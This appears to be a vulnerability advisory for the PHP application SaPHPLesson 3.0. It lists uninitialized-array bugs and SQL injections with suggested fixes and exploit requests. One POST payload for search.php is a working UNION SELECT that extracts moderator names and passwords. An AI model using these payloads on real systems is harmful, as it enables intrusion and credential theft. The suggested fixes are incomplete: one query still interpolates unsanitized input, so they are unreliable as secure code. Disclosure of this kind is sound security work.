SaPHPLesson 3.0 Multbugs
SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:
1- Unfilter array
Filename :- show.php
Line :- 102
[code]
$hrow[] = $Row2;[/code]
Fix :-
Add To Line [ 11 ] /show.php This Code :-
we add the code to global to fix all unfilter ver. at the code :)
[code]
$hrow = array();[/code]
Exploit :-
GET ^
/lessons/show.php?lessid=1&hrow=D3vil-0x1
/---------------------------------------------------------/
2- Unfilter array
Filename :- showcat.php
Line :- 80
[code]
$Lsnrow[] = $Row;[/code]
Fix :-
Add To Line [ 11 ] /showcat.php This Code :-
we add the code to global to fix all unfilter ver. at the code :)
[code]
$Lsnrow = array();[/code]
Exploit :-
GET ^
/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1
/---------------------------------------------------------/
3- SQL Injection
Filename :- search.php
Line :- MultLines
Fix :-
Line 28 Replace It With
[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY
less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by
".addslashes($Order)." ".addslashes($Trteb)."";[/code]
Line 32 Replace It With
[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find
REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and
forums.id=less.forumno order by ".addslashes($Order)."
".addslashes($Trteb)."";[/code]
Exploit :-
POST ^
Word=a&Find=lesstitle UNION ALL SELECT
null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null
FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC
/---------------------------------------------------------/
4- SQL Injection
Filename :- misc.php
Line :- 64
Fix :-
Replace Line 62 & 63 With This Code
[code]
$LID = intval($_GET["LID"]);
$Rate = intval($_POST["Rate"]);[/code]
/---------------------------------------------------------/
5- Unfilter array
Filename :- index.php
Line :- 24
[code]
$rows[] = $Row;[/code]
Fix :-
Add To Line [ 11 ] /index.php This Code :-
we add the code to global to fix all unfilter ver. at the code :)
[code]
$rows = array();
$hrow = array();[/code]
Exploit :-
GET ^
/saphplesson/index.php?rows=D3vil-x01